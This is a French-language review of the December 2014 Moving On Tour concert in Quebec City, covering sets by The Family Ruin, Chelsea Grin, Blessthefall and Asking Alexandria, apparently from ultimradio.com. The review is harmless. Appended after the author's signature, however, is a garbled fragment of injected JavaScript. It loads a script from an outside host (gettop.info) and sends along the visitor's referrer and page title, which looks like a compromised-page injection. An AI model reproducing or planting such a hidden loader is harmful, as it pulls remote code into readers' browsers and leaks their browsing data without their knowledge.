Critique du Moving On Tour: Asking Alexandria/Blessthefall/Chelsea Grin/The Family Ruin.

 

Bonjour à tous !! Mercredi le 10 décembre fût marqué par notre première tempête hivernale de 2014…Mais également par la venue du Moving On Tour, comprenant les groupes ; Asking Alexandria, Blessthefall, Upon A Burning Body, Chelsea Grin et The Family Ruin. Malgré la température, des centaines de personnes ont bravés le mauvais temps pour venir passer une excellente soirée à l’impérial de Québec. Malheureusement, Upon A Burning Body n’a pu être présent, supposément dû à des problèmes mécaniques. Malgré tout, se fût une soirée réussie et voici pourquoi…

 

The Family Ruin : Le band était à sa première visite dans la ville de Québec et il a su faire une très bonne première impression. C’est donc avec un retard d’environs trente minutes que le groupe est entré sur scène. Même si le groupe n’est pas encore très connu par ici, il a eu droit à une excellente réaction de la foule, qui a même eu l’air de les avoir surpris. Le groupe avait une très bonne prestance sur scène et côté musical, le groupe n’a absolument rien à envier aux autres groupes de leur genre. Une setlist courte, mais assez longue pour nous donner le goût d’aller écouter leurs compositions et d’apprendre à les connaitre. Une belle découverte pour beaucoup de gens présents.

 

Chelsea Grin : Voici maintenant venu le temps du deuxième groupe à se présenter sur scène. Eux aussi ont eu droit à un accueil plus que chaleureux. Petit changement de style par rapport à The Family Ruin, car Chelsea Grin offre un son plus death core, mais malgré tout, la sonorité du groupe venait se marier très bien au thème de la tournée Moving On Tour. La foule fût plus énergique qu’au groupe qui les précédait. Il y a eu beaucoup plus de mushpit et d’agitations au parterre, ce qui a donné un petit boost de plus à la foule. Encore une setlist un peu courte, environs la même durée que The Family Ruin, mais en prenant en considération le nombre de groupes invités pour cette tournée, ceci reste très acceptable.

 

Blessthefall : Beaucoup de fans présents étaient là pour Blessthefall malgré le fait que c’est Asking Alexandria qui est à la tête de la tournée. La foule à totalement disjonctée à l’arrivée du band. Beau Bokan, le chanteur du groupe, était totalement en forme et ça se voyait. Il se promenait partout sur scène, était toujours en mouvement. Il est même allé à quelques reprises sur la barricade, au plus grand plaisir des fans. Il interagissait beaucoup avec la foule. Il a même parlé de la beauté de la ville de Québec et a promis qu’il reviendrait dès que possible. Durant leurs chansons Déjà Vu, Beau à même invité ceux, pour qui s’était leur première fois qu’ils voyaient Blessthefall, à venir lui faire un high five, et ce, en body surfing. Mission un peu dure à accomplir, car la sécurité repoussait les gens. Bokan a également demandé à la foule de faire deux circles pit en même temps, et aussi un wall of death peu de temps après la chanson Bottomfeeder. Ils ont interprétés leurs hits tels que ; You Wear a Crown But You’re No King, What’s Left of Me, Déjà Vu, See You on the Outside et Hollow Bodies. Le drummer du groupe Chelsea Grin est même venu, comme par surprise, compléter la chanson The Reign, avec le reste du groupe. Après une performance plus qu’excellente, c’est maintenant au tour du groupe principal à faire son entré.

 

Asking Alexandria : Après une petite intro musicale assurée par The Final Countown, le band fait son entrée sur scène avec Don’t Pray for Me. Déjà dès le début, nous pouvions remarquer une forte puissance des jeux de lumières que les techniciens avaient préparés. Après quelques morceaux, on peut déjà constater que les musiciens sont bien présents, actifs et rendent un son impeccable… mais il en est toutefois autre chose pour Danny Worsnop, le chanteur du groupe. En effet, Danny n’avait aucune prestance sur scène, statique devant son micro, ne bougeait pas plus qu’il ne le faut et paraissait même un peu pompette. Il manquait tellement d’énergie que durant le spectacle, il s’est couché par terre en disant à la foule : Shut Up, I’m taking a nap. Également, Danny ne réussissait pas à atteindre les hautes notes, nous pouvions presque croire qu’il faisait des vocalises. Les autres membres du groupe ont tentés, tant bien que de mal, de corriger le tout, mais rendu à ce point, le mal était déjà fait. À mon avis c’est un peu décevant pour les fans du groupe, mais malgré tout, ils ont eu l’air d’avoir appréciés le spectacle offert. Le band a joué des titres comme; Moving on, The death of Me, Killing you, Poison, A prophecy, The Final Episode et j’en passe. Certains titres joués étaient différents des versions enregistrées en studio. Soit le tempo ou la vitesse de la chanson était modifié, ou même l’intégralité même de la chanson l’était parfois, ce qui menait certaines confusions pour les fans. Même si Danny n’interagissait pas beaucoup, quand il le faisait, il le faisait avec un brin d’humour, ce qui aidait parfois à oublier son manque de prestance et son air de gars fini. Malgré les petites lacunes rencontrées, se fut quand même un bon moment pour terminer une soirée bien arrosée d’une dose de Metalcore.

 

En conclusion, se fût une excellente soirée de Metalcore, qui a surement rassasiée les fans présents qui en demande toujours plus, car ce style de musique ne se présente que très rarement à Québec. D’excellentes découvertes pour ceux qui ne connaissaient pas les groupes invités, un Blessthefall, qui a volé la vedette, si on en croit certains fans présents, et un groupe principal qui offre une bonne prestation, malgré un chanteur qui aurait pu être plus présent pour ses fans et être dans un meilleur état. Sur ce, je vous salue et je vous invite à revenir sur ultimradio.com pour plus de critiques, de photos et de nouvelles sur vos spectacles préférés.

See Ya !

Christopher Drouins.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;